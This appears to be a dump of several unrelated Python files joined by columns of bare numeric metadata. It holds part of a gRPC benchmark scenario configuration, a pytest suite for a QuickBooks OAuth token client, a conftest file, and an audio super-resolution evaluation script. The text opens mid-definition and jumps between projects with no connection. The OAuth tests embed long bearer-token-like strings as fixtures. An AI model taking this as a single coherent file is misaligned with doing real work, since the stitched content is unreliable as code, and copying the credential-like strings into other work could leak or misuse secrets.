'server_type': 'ASYNC_SERVER',
'security_params': secargs,
'core_limit': 0,
'async_server_threads': 0,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
yield {
'name': 'csharp_protobuf_sync_to_async_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'SYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_SERVER',
'security_params': secargs,
'core_limit': 0,
'async_server_threads': 0,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
yield {
'name': 'csharp_to_cpp_protobuf_sync_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'SYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'SYNC_SERVER',
'security_params': secargs,
'core_limit': 1,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS,
'SERVER_LANGUAGE': 'c++' # recognized by run_performance_tests.py
}
def __str__(self):
return 'csharp'
class NodeLanguage:
def __init__(self):
pass
self.safename = str(self)
def worker_cmdline(self):
return ['tools/run_tests/performance/run_worker_node.sh']
def worker_port_offset(self):
return 200
def scenarios(self):
# TODO(jtattermusch): add more scenarios
secargs = SECURE_SECARGS
yield {
'name': 'node_protobuf_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_SERVER',
'security_params': secargs,
'core_limit': 0,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
def __str__(self):
return 'node'
class PythonLanguage:
def __init__(self):
self.safename = 'python'
def worker_cmdline(self):
return ['tools/run_tests/performance/run_worker_python.sh']
def worker_port_offset(self):
return 500
def scenarios(self):
yield {
'name': 'python_to_cpp_protobuf_streaming_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': SECURE_SECARGS,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'STREAMING',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'SYNC_SERVER',
'security_params': SECURE_SECARGS,
'core_limit': 0,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS,
'SERVER_LANGUAGE': 'c++'
}
yield {
'name': 'python_protobuf_sync_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'SYNC_CLIENT',
'security_params': SECURE_SECARGS,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'SYNC_SERVER',
'security_params': SECURE_SECARGS,
'core_limit': 0,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS,
}
yield {
'name': 'python_protobuf_async_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': SECURE_SECARGS,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'SYNC_SERVER',
'security_params': SECURE_SECARGS,
'core_limit': 0,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS,
}
yield {
'name': 'python_to_cpp_single_channel_throughput',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': SECURE_SECARGS,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'STREAMING',
'load_params': {
'closed_loop': {}
},
'payload_config': BIG_GENERIC_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_GENERIC_SERVER',
'security_params': SECURE_SECARGS,
'core_limit': SINGLE_MACHINE_CORES/2,
'async_server_threads': 1,
'payload_config': BIG_GENERIC_PAYLOAD,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS,
'SERVER_LANGUAGE': 'c++'
}
def __str__(self):
return 'python'
class RubyLanguage:
    """Benchmark driver for the Ruby gRPC implementation."""

    def __init__(self):
        # BUG FIX: a stray `pass` preceded this assignment (dead statement).
        self.safename = str(self)

    def worker_cmdline(self):
        """Command line used to launch a Ruby QPS worker process."""
        return ['tools/run_tests/performance/run_worker_ruby.sh']

    def worker_port_offset(self):
        """Port offset so Ruby workers do not collide with other languages."""
        return 300

    def scenarios(self):
        """Yield benchmark scenario configs for Ruby.

        Currently a single secure sync unary ping-pong scenario.
        """
        # TODO(jtattermusch): add more scenarios
        secargs = SECURE_SECARGS
        yield {
            'name': 'ruby_protobuf_unary_ping_pong',
            'num_servers': 1,
            'num_clients': 1,
            'client_config': {
                'client_type': 'SYNC_CLIENT',
                'security_params': secargs,
                'outstanding_rpcs_per_channel': 1,
                'client_channels': 1,
                'async_client_threads': 1,
                'rpc_type': 'UNARY',
                'load_params': {
                    'closed_loop': {}
                },
                'payload_config': EMPTY_PROTO_PAYLOAD,
                'histogram_params': HISTOGRAM_PARAMS,
            },
            'server_config': {
                'server_type': 'SYNC_SERVER',
                'security_params': secargs,
                'core_limit': 0,
                'async_server_threads': 1,
            },
            'warmup_seconds': WARMUP_SECONDS,
            'benchmark_seconds': BENCHMARK_SECONDS
        }

    def __str__(self):
        return 'ruby'
class JavaLanguage:
    """Benchmark driver for the Java gRPC implementation."""

    def __init__(self):
        # BUG FIX: a stray `pass` preceded this assignment (dead statement).
        self.safename = str(self)

    def worker_cmdline(self):
        """Command line used to launch a Java QPS worker process."""
        return ['tools/run_tests/performance/run_worker_java.sh']

    def worker_port_offset(self):
        """Port offset so Java workers do not collide with other languages."""
        return 400

    def scenarios(self):
        """Yield benchmark scenario configs for Java.

        One sync unary ping-pong scenario per security mode (secure/insecure).
        Java uses its own, longer warmup (JIT warm-up).
        """
        # TODO(jtattermusch): add more scenarios
        for secure in [True, False]:
            if secure:
                secstr = 'secure'
                secargs = SECURE_SECARGS
            else:
                secstr = 'insecure'
                secargs = None
            yield {
                'name': 'java_protobuf_unary_ping_pong_%s' % secstr,
                'num_servers': 1,
                'num_clients': 1,
                'client_config': {
                    'client_type': 'SYNC_CLIENT',
                    'security_params': secargs,
                    'outstanding_rpcs_per_channel': 1,
                    'client_channels': 1,
                    'async_client_threads': 1,
                    'rpc_type': 'UNARY',
                    'load_params': {
                        'closed_loop': {}
                    },
                    'payload_config': EMPTY_PROTO_PAYLOAD,
                    'histogram_params': HISTOGRAM_PARAMS,
                },
                'server_config': {
                    'server_type': 'SYNC_SERVER',
                    'security_params': secargs,
                    'core_limit': 0,
                    'async_server_threads': 1,
                },
                'warmup_seconds': JAVA_WARMUP_SECONDS,
                'benchmark_seconds': BENCHMARK_SECONDS
            }

    def __str__(self):
        return 'java'
# Registry mapping a language name to its benchmark driver instance.
LANGUAGES = {
    'c++': CXXLanguage(),
    'csharp': CSharpLanguage(),
    'node': NodeLanguage(),
    'ruby': RubyLanguage(),
    'java': JavaLanguage(),
    'python': PythonLanguage(),
}
| 30.54717
| 76
| 0.569962
| 2,072
| 21,047
| 5.396236
| 0.127413
| 0.044182
| 0.074054
| 0.022538
| 0.819068
| 0.800912
| 0.790538
| 0.772024
| 0.767731
| 0.767731
| 0
| 0.012241
| 0.320758
| 21,047
| 688
| 77
| 30.59157
| 0.769866
| 0.092887
| 0
| 0.75208
| 0
| 0
| 0.37296
| 0.075999
| 0
| 0
| 0
| 0.001453
| 0
| 1
| 0.049917
| false
| 0.004992
| 0
| 0.02995
| 0.08985
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9b350fb2bdca85345bbcc310558f70d81324f724
| 6,278
|
py
|
Python
|
tests/test_ouath.py
|
gbozee/accounting-oauth
|
ab522a340a1fdb82cd5db72bdb019b41951bdb90
|
[
"MIT"
] | null | null | null |
tests/test_ouath.py
|
gbozee/accounting-oauth
|
ab522a340a1fdb82cd5db72bdb019b41951bdb90
|
[
"MIT"
] | null | null | null |
tests/test_ouath.py
|
gbozee/accounting-oauth
|
ab522a340a1fdb82cd5db72bdb019b41951bdb90
|
[
"MIT"
] | null | null | null |
import pytest
import datetime
from accounting_oauth import AccountingOauth, StorageInterface
@pytest.fixture
def q_client(quickbook_client):
    """QuickBooks OAuth client backed by a fresh, empty storage interface."""
    storage = StorageInterface()
    return quickbook_client(storage)
@pytest.mark.asyncio
async def test_authorization(q_client: AccountingOauth, mock_request, mocker):
    """A successful auth-code callback exchanges the code and stores both tokens."""
    # Expected tokens, named once so the mock payload and the assertions
    # cannot drift apart.
    access_token = "eyJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwiYWxnIjoiZGlyIn0..Jf3JsITu2P6GE4ufb6ElYA.0ZSTcoePtEMg5xHda7RjuMtPFIY93MsC-CU8fjK8kZJRBtYVgX1vCUpeK6IqI6f6QD3DMuzaHDSLWuH4gqXmEsYniYizLQ4eQJwFHyxhiF9jYC_SV7yPd4yUoG1DrhirU0Ujy_Dw02vkMXIJSOEAg4HUWg1CmNEKTvTWn4X5LutJeIt8A2FsSU-Dinlg32HUfftT87GMz7_2IE_do4gfqhQsH2aRIE26n7OPql153JJEgjH-FeCJ6_ZjWbD8T5ZAmDB9MO7xvvqQR8a6Vh9b3ukZ3CqbL7KaejxxiZGM6sGmimT9fhoeaIgVNX5S6x3oDIfZNKtmHiyswOsd_p5aj00tjbBdgQxgasp_Z7TTqzxg04RtS3jgtwIaaApbP3yp-UCTneUU0sL01znql8MUbNL4EXmegBEUtBD_El_C7wr7RAWpNLEwv9pw1hJT9fuXUyxA6P9fwL_I6HCnZDvrer6oCc7-POVQ8kXXE9eMQ1-70AA8-l6vRxj6Pj8xny2_lUWnvZJWxvInQ6aJQGT6tDHaAh60Ipd4P6b6UC2Qtyo6Ld4GQWYnRU4i_VEq32ciY7jYyyelDV-CnWdM2W6CcpTZg8lMVzM5QdoNMerySjzSsadk9q0gmseGCJkkgBi1kxNERam_xXN3urvg0w4HU0lria1nEk0kMlEMPD7XthvWQ4HXAXjT1aRa-YoLukkb.XNZBgw0xILTZylda_g4S3Q"
    refresh_token = "Q011532713322Pgork3wPLnNTwNOPXsYpvBU8rrkW4W8jNYa8O"
    mock_httpx = mocker.patch("accounting_oauth.oauth.request_helper")
    mock_httpx.return_value = mock_request(
        {
            "access_token": access_token,
            "expires_in": 3600,
            "refresh_token": refresh_token,
            "token_type": "bearer",
            "x_refresh_token_expires_in": 8721585,
        }
    )
    authorization_response = {
        "code": "the developer is here",
        "state": q_client.state,
        "realmId": "1234",
    }
    # BUG FIX: compare to None with `is`, not `==` (PEP 8 / E711).
    assert q_client.interface.access_token is None
    await q_client.on_auth_response(**authorization_response)
    assert_get_token(mock_httpx, authorization_response["code"])
    assert q_client.interface.access_token == access_token
    assert q_client.interface.refresh_token == refresh_token
def assert_get_token(mock_post, code):
    """Verify the token endpoint was last called with an authorization-code grant."""
    expected_payload = {
        "grant_type": "authorization_code",
        "redirect_uri": "http://testserver/quickbooks/auth-response",
        "code": code,
    }
    mock_post.assert_called_with(
        "https://oauth.platform.intuit.com/oauth2/v1/tokens/bearer",
        "POST",
        data=expected_payload,
        headers={},
    )
def assert_refresh_token(mock_post, refresh_token):
    """Verify the token endpoint was last called with a refresh-token grant."""
    expected_payload = {"grant_type": "refresh_token", "refresh_token": refresh_token}
    mock_post.assert_called_with(
        "https://oauth.platform.intuit.com/oauth2/v1/tokens/bearer",
        "POST",
        data=expected_payload,
        headers={},
    )
@pytest.mark.asyncio
async def test_refreshing_token_that_has_expired(
    quickbook_client: AccountingOauth, mock_request, mocker
):
    """An expired access token is replaced via the refresh-token grant."""
    # Seed the client with a refresh token and an access token whose
    # date_added is far in the past, so has_expired() is True up front.
    q_client = quickbook_client(
        StorageInterface(
            refresh_token="Q011532713322Pgork3wPLnNTwNOPXsYpvBU8rrkW4W8jNYa8O",
            access_token="eyJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwiYWxnIjoiZGlyIn0..Jf3JsITu2P6GE4ufb6ElYA.0ZSTcoePtEMg5xHda7RjuMtPFIY93MsC-CU8fjK8kZJRBtYVgX1vCUpeK6IqI6f6QD3DMuzaHDSLWuH4gqXmEsYniYizLQ4eQJwFHyxhiF9jYC_SV7yPd4yUoG1DrhirU0Ujy_Dw02vkMXIJSOEAg4HUWg1CmNEKTvTWn4X5LutJeIt8A2FsSU-Dinlg32HUfftT87GMz7_2IE_do4gfqhQsH2aRIE26n7OPql153JJEgjH-FeCJ6_ZjWbD8T5ZAmDB9MO7xvvqQR8a6Vh9b3ukZ3CqbL7KaejxxiZGM6sGmimT9fhoeaIgVNX5S6x3oDIfZNKtmHiyswOsd_p5aj00tjbBdgQxgasp_Z7TTqzxg04RtS3jgtwIaaApbP3yp-UCTneUU0sL01znql8MUbNL4EXmegBEUtBD_El_C7wr7RAWpNLEwv9pw1hJT9fuXUyxA6P9fwL_I6HCnZDvrer6oCc7-POVQ8kXXE9eMQ1-70AA8-l6vRxj6Pj8xny2_lUWnvZJWxvInQ6aJQGT6tDHaAh60Ipd4P6b6UC2Qtyo6Ld4GQWYnRU4i_VEq32ciY7jYyyelDV-CnWdM2W6CcpTZg8lMVzM5QdoNMerySjzSsadk9q0gmseGCJkkgBi1kxNERam_xXN3urvg0w4HU0lria1nEk0kMlEMPD7XthvWQ4HXAXjT1aRa-YoLukkb.XNZBgw0xILTZylda_g4S3Q",
            date_added=datetime.datetime(2019, 5, 10),  # access token has expired
        )
    )
    mock_httpx = mocker.patch("accounting_oauth.oauth.request_helper")
    # NOTE: result_token deliberately differs from the seeded access token by
    # one character ("OiTB" vs "OiJB"), so a successful refresh is observable.
    result_token = "eyJlbmMiOiTBMTI4Q0JDLUhTMjU2IiwiYWxnIjoiZGlyIn0..Jf3JsITu2P6GE4ufb6ElYA.0ZSTcoePtEMg5xHda7RjuMtPFIY93MsC-CU8fjK8kZJRBtYVgX1vCUpeK6IqI6f6QD3DMuzaHDSLWuH4gqXmEsYniYizLQ4eQJwFHyxhiF9jYC_SV7yPd4yUoG1DrhirU0Ujy_Dw02vkMXIJSOEAg4HUWg1CmNEKTvTWn4X5LutJeIt8A2FsSU-Dinlg32HUfftT87GMz7_2IE_do4gfqhQsH2aRIE26n7OPql153JJEgjH-FeCJ6_ZjWbD8T5ZAmDB9MO7xvvqQR8a6Vh9b3ukZ3CqbL7KaejxxiZGM6sGmimT9fhoeaIgVNX5S6x3oDIfZNKtmHiyswOsd_p5aj00tjbBdgQxgasp_Z7TTqzxg04RtS3jgtwIaaApbP3yp-UCTneUU0sL01znql8MUbNL4EXmegBEUtBD_El_C7wr7RAWpNLEwv9pw1hJT9fuXUyxA6P9fwL_I6HCnZDvrer6oCc7-POVQ8kXXE9eMQ1-70AA8-l6vRxj6Pj8xny2_lUWnvZJWxvInQ6aJQGT6tDHaAh60Ipd4P6b6UC2Qtyo6Ld4GQWYnRU4i_VEq32ciY7jYyyelDV-CnWdM2W6CcpTZg8lMVzM5QdoNMerySjzSsadk9q0gmseGCJkkgBi1kxNERam_xXN3urvg0w4HU0lria1nEk0kMlEMPD7XthvWQ4HXAXjT1aRa-YoLukkb.XNZBgw0xILTZylda_g4S3Q"
    mock_httpx.return_value = mock_request(
        {
            "access_token": result_token,
            "expires_in": 3600,
            "refresh_token": "Q011532713322Pgork3wPLnNTwNOPXsYpvBU8rrkW4W8jNYa8O",
            "token_type": "bearer",
            "x_refresh_token_expires_in": 8721585,
        }
    )
    assert q_client.interface.has_expired()
    result, error = await q_client.refresh_token(q_client.interface.refresh_token)
    # save token
    await q_client.interface.save_token(**result)
    assert_refresh_token(mock_httpx, q_client.interface.refresh_token)
    assert result["access_token"] == result_token
    assert not q_client.interface.has_expired()
| 68.23913
| 831
| 0.821121
| 417
| 6,278
| 11.983213
| 0.268585
| 0.036022
| 0.025615
| 0.122473
| 0.798879
| 0.756454
| 0.73384
| 0.73384
| 0.719232
| 0.698019
| 0
| 0.114778
| 0.121536
| 6,278
| 91
| 832
| 68.989011
| 0.791296
| 0.005575
| 0
| 0.3
| 0
| 0.05
| 0.638315
| 0.572776
| 0
| 0
| 0
| 0
| 0.15
| 1
| 0.0375
| false
| 0
| 0.0375
| 0.0125
| 0.0875
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9b6fc6b1e634c8154d3cd2a41c460ea323bb8b52
| 97
|
py
|
Python
|
tests/conftest.py
|
vopri/battle-python
|
e01439562ccddee718b089fb5f171a2841c204a3
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
vopri/battle-python
|
e01439562ccddee718b089fb5f171a2841c204a3
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
vopri/battle-python
|
e01439562ccddee718b089fb5f171a2841c204a3
|
[
"MIT"
] | null | null | null |
from fixtures_board import *
from fixtures_move_decisions import *
from fixtures_snakes import *
| 24.25
| 37
| 0.845361
| 13
| 97
| 6
| 0.538462
| 0.461538
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123711
| 97
| 3
| 38
| 32.333333
| 0.917647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9ba843f984efef81ecf82bd67bea997ca207043e
| 20,945
|
py
|
Python
|
Evaluate.py
|
JamesKing76/AudioSuperResolution
|
85114887248c02b1c80f7162c909f6fe51d3667e
|
[
"MIT"
] | null | null | null |
Evaluate.py
|
JamesKing76/AudioSuperResolution
|
85114887248c02b1c80f7162c909f6fe51d3667e
|
[
"MIT"
] | null | null | null |
Evaluate.py
|
JamesKing76/AudioSuperResolution
|
85114887248c02b1c80f7162c909f6fe51d3667e
|
[
"MIT"
] | null | null | null |
import argparse
import os
import matplotlib.pyplot as plt
import numpy as np
import soundfile as sf
import torch
from matplotlib import cm
from matplotlib.colors import ListedColormap
from Processing.Filter import butter_lowpass_filter
from Models.AudioEDSR import AudioEDSR
from Models.AudioUNet import AudioUNet, AudioUNet_shuffle
from Training_Functions.Evaluation_Functions import LSD, SNR
from Training_Functions.Interpolation_NoML import spline_interpolation, linear_interpolation, flat_interpolation
# This file is used for evaluating the models
# Command-line configuration for model evaluation.
parser = argparse.ArgumentParser()
parser.add_argument("-M", "--model", default="UNET", type=str, help="EDSR|UNET|GAN")
# BUG FIX: scale feeds integer arithmetic below (e.g. 12000 // (2 * scale)),
# so it must be parsed as int; type=str broke any explicitly passed value.
parser.add_argument("-S", "--scale", default=2, type=int, help="The amount the model upsamples a signal by")
parser.add_argument("-P", "--modeldetail", default="", type=str, help="The postfix to the model in the file name. e.g."
                                                                     " 4EDSRL2 would have modeldetail ' L2' ")
parser.add_argument("-L", "--linear", default=False, type=bool, help="load linear data? false for deep learning models")
parser.add_argument("--single", default=False, type=bool, help="Test on single file?")
parser.add_argument("-F", "--file", default="", type=str, help="The file for single file testing")
parser.add_argument("-D", "--dir", default="." + os.path.sep + "Data" + os.path.sep + "TEST", type=str,
                    help="The directory for for multi file testing")
args = parser.parse_args()

# BUG FIX: the option is registered as "--model", so argparse exposes it as
# args.model; the original read args.method, which raises AttributeError.
method = args.model
scale = args.scale
ext = args.modeldetail
Linear = args.linear
single = args.single
file = args.file
wave_dir = args.dir
# Run on GPU when available; checkpoints are still deserialized on CPU below.
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

# Spectrogram colormap derived from 'plasma'. NOTE(review): the -2..1.2
# linspace over/under-shoots the [0, 1] sample range (values are clipped),
# presumably to stretch the palette — the plain 0..1 variant is kept below.
viridisBig = cm.get_cmap('plasma')
newcmp = ListedColormap(viridisBig(np.linspace(-2, 1.2, 512)))
#
# newcmp = ListedColormap(viridisBig(np.linspace(0, 1, 512)))

if not Linear:
    # Deep-learning path: build the requested network and load its
    # checkpoint from ./Data/<scale><method><ext>.t7 .
    if method == "EDSR":
        model = AudioEDSR(in_channels=1, out_channels=1, num_features=128, num_resblocks=32,
                          res_scale=0.1,
                          upscale_factor=scale, kernel_size=3).to(device)
    elif method == "UNET" or method == "GAN":
        model = AudioUNet(in_channels=1, out_channels=1, num_resblocks=4, upscale_factor=scale,
                          minfilterlength=9, maxfiltersize=512).to(device)
    else:
        model = AudioUNet_shuffle(in_channels=1, out_channels=1, num_resblocks=4, upscale_factor=scale,
                                  minfilterlength=9, maxfiltersize=512).to(device)
    model.load_state_dict(
        torch.load(os.path.join("." + os.sep + "Data", str(scale) + method + ext + ".t7"),
                   map_location=torch.device('cpu')))
    # wandb.watch(model)
    print(model)
    model.eval()
    # Per-file metric accumulators for the multi-file path.
    LSD_list = []
    SNR_list = []
    if single:
        # file = '.\\Data\\Test\\p228_045_mic1.flac'
        # file = "." + os.path.sep + "Data" + os.path.sep + "zeros.flac"
        # Downsample: low-pass + decimate to a 12 kHz reference, then again
        # by `scale` to produce the low-resolution input.
        inp = sf.read(file)[0]
        inp_filted = butter_lowpass_filter(inp, 48000 // (2 * 4), 48000).astype('float32')
        inp_filted_hr = inp_filted[::4]
        inp_filted_hr = inp_filted_hr[:len(inp_filted_hr) - (len(inp_filted_hr) % scale)]
        inp_filted_lr = torch.from_numpy( butter_lowpass_filter(
            inp_filted_hr, 12000 // (2 * scale), 12000).astype('float32'))
        inp_filted_lr = inp_filted_lr.clone()[0:len(inp_filted_lr) - (len(inp_filted_lr) % scale):scale]
        # predicts interpolates /super resolves the signal
        pred_data_spline = spline_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
        if method == "EDSR":
            pred_data = model(inp_filted_lr.detach().clone().
                              add(1).unsqueeze(0).unsqueeze(0)).sub(1).cpu().detach().numpy()[0][0]
        else:
            pred_data = model(pred_data_spline.detach().clone().unsqueeze(0)).sub(1).cpu().detach().numpy()[0][0]
        pred_data_spline = pred_data_spline.sub(1).cpu().detach().numpy()[0]
        print(pred_data_spline.shape)
        print(inp_filted_hr.shape)
        # inp_filted_lr = inp_filted_lr.sub(1)
        # Write prediction, high-res reference, low-res input and spline
        # baseline out for listening comparison.
        sf.write(os.path.join(
            '.' + os.sep + 'Data',
            'Predict ' + 'Scale ' + str(scale) + "PRED.flac"), pred_data, 12000)
        sf.write(os.path.join(
            '.' + os.sep + 'Data',
            'Predict ' + 'Scale ' + str(scale) + "HIGH.flac"), inp_filted_hr, 12000)
        sf.write(os.path.join(
            '.' + os.sep + 'Data',
            'Predict ' + 'Scale ' + str(scale) + "LOW.flac"), inp_filted_lr, 12000 // scale)
        sf.write(os.path.join(
            '.' + os.sep + 'Data',
            'Predict ' + 'Scale ' + str(scale) + "SPLINE.flac"), pred_data_spline, 12000)
        # Side-by-side spectrograms: low-res, prediction, spline, high-res.
        fig = plt.figure(figsize=(30, 5))
        subplot = fig.add_subplot(scale, 5, 1)
        plt.specgram(inp_filted_lr, Fs=12000 // scale, cmap=newcmp)
        subplot = fig.add_subplot(1, 5, 2)
        plt.specgram(pred_data, Fs=12000, cmap=newcmp, NFFT=256 * 2)
        subplot = fig.add_subplot(1, 5, 3)
        plt.specgram(pred_data_spline, Fs=12000, cmap=newcmp, NFFT=256 * 2)
        subplot = fig.add_subplot(1, 5, 4)
        plt.specgram(inp_filted_hr, Fs=12000, cmap=newcmp, NFFT=256 * 2)
        subplot = fig.add_subplot(1, 5, 5)
        plt.colorbar(label="ok", orientation="vertical")
        plt.show()
        print("Discrepancy with testing results")
        print("ModelLSD: ", LSD(pred_data, inp_filted_hr))
        print("SplineLSD: ", LSD(pred_data_spline, inp_filted_hr))
        print("ModelSNR: ", SNR(pred_data, inp_filted_hr))
        print("SplineSNR: ", SNR(pred_data_spline, inp_filted_hr))
        # print(max(pred_data), "<->", min(pred_data))
        # print(max(inp_filted_hr), "<->", min(inp_filted_hr))
        # print(max(inp_filted_lr), "<->", min(inp_filted_lr))
        # print(max(pred_data_spline), "<->", min(pred_data_spline))
    else:
        # file = '.\\Data\\Test\\p228_045_mic1.flac'
        # wave_dir = "." + os.path.sep + "Data" + os.path.sep + "TEST"
        files = [os.path.join(wave_dir, x) for x in os.listdir(wave_dir)]
        data = []
        for file in files:
            inp = sf.read(file)[0]
            inp_filted = butter_lowpass_filter(inp, 48000 // (2 * 4), 48000).astype('float32')
            inp_filted_hr = inp_filted[::4]
            inp_filted_hr = inp_filted_hr[:len(inp_filted_hr) - (len(inp_filted_hr) % scale)]
            print(len(inp))
            print(len(inp_filted))
            inp_filted_lr = torch.from_numpy(
                butter_lowpass_filter(inp_filted_hr, 12000 // (2 * scale), 12000).astype('float32'))
            inp_filted_lr = inp_filted_lr.clone()[0:len(inp_filted_lr) - (len(inp_filted_lr) % scale):scale]
            pred_data_spline = spline_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
            if method == "EDSR":
                pred_data = model(inp_filted_lr.detach().clone().add(1).
                                  unsqueeze(0).unsqueeze(0)).sub(1).cpu().detach().numpy()[0][0]
            else:
                pred_data = model(pred_data_spline.detach().clone().unsqueeze(0)).sub(1).cpu().detach().numpy()[0][0]
            pred_data_spline = pred_data_spline.sub(1).cpu().detach().numpy()[0]
            print(pred_data_spline.shape)
            print(inp_filted_hr.shape)
            # inp_filted_lr = inp_filted_lr.sub(1)
            sf.write(os.path.join(
                '.' + os.sep + 'Data',
                'Predict ' + 'Scale ' + str(scale) + "PRED.flac"), pred_data, 12000)
            sf.write(os.path.join(
                '.' + os.sep + 'Data',
                'Predict ' + 'Scale ' + str(scale) + "HIGH.flac"), inp_filted_hr, 12000)
            sf.write(os.path.join(
                '.' + os.sep + 'Data',
                'Predict ' + 'Scale ' + str(scale) + "LOW.flac"), inp_filted_lr, 12000 // scale)
            sf.write(os.path.join(
                '.' + os.sep + 'Data',
                'Predict ' + 'Scale ' + str(scale) + "Spline.flac"), pred_data_spline, 12000)
            fig = plt.figure(figsize=(30, 5))
            subplot = fig.add_subplot(scale, 5, 1)
            plt.specgram(inp_filted_lr, Fs=12000 // scale, cmap=newcmp)
            subplot = fig.add_subplot(1, 5, 2)
            plt.specgram(pred_data, Fs=12000, cmap=newcmp, NFFT=256 * scale)
            subplot = fig.add_subplot(1, 5, 3)
            plt.specgram(pred_data_spline, Fs=12000, cmap=newcmp, NFFT=256 * scale)
            subplot = fig.add_subplot(1, 5, 4)
            plt.specgram(inp_filted_hr, Fs=12000, cmap=newcmp, NFFT=256 * scale)
            subplot = fig.add_subplot(1, 5, 5)
            plt.colorbar(label="ok", orientation="vertical")
            plt.show()
            # LSD_list.append(LSD(pred_data, inp_filted_hr))
            # SNR_list.append(SNR(pred_data, inp_filted_hr))
            LSD_list.append(LSD(pred_data, inp_filted_hr))
            SNR_list.append(SNR(pred_data, inp_filted_hr))
            print("Discrepancy with testing results")
            print("ModelLSD: ", LSD(pred_data, inp_filted_hr))
            print("SplineLSD: ", LSD(pred_data_spline, inp_filted_hr))
            print("ModelSNR: ", SNR(pred_data, inp_filted_hr))
            print("SplineSNR: ", SNR(pred_data_spline, inp_filted_hr))
            # print(max(pred_data), "<->", min(pred_data))
            # print(max(inp_filted_hr), "<->", min(inp_filted_hr))
            # print(max(inp_filted_lr), "<->", min(inp_filted_lr))
            # print(max(pred_data_spline), "<->", min(pred_data_spline))
        print("meanLSD: ", np.mean(LSD_list))
        print("varLSD: ", np.var(LSD_list))
        print("meanSNR: ", np.mean(SNR_list))
        print("varSNR: ", np.var(SNR_list))
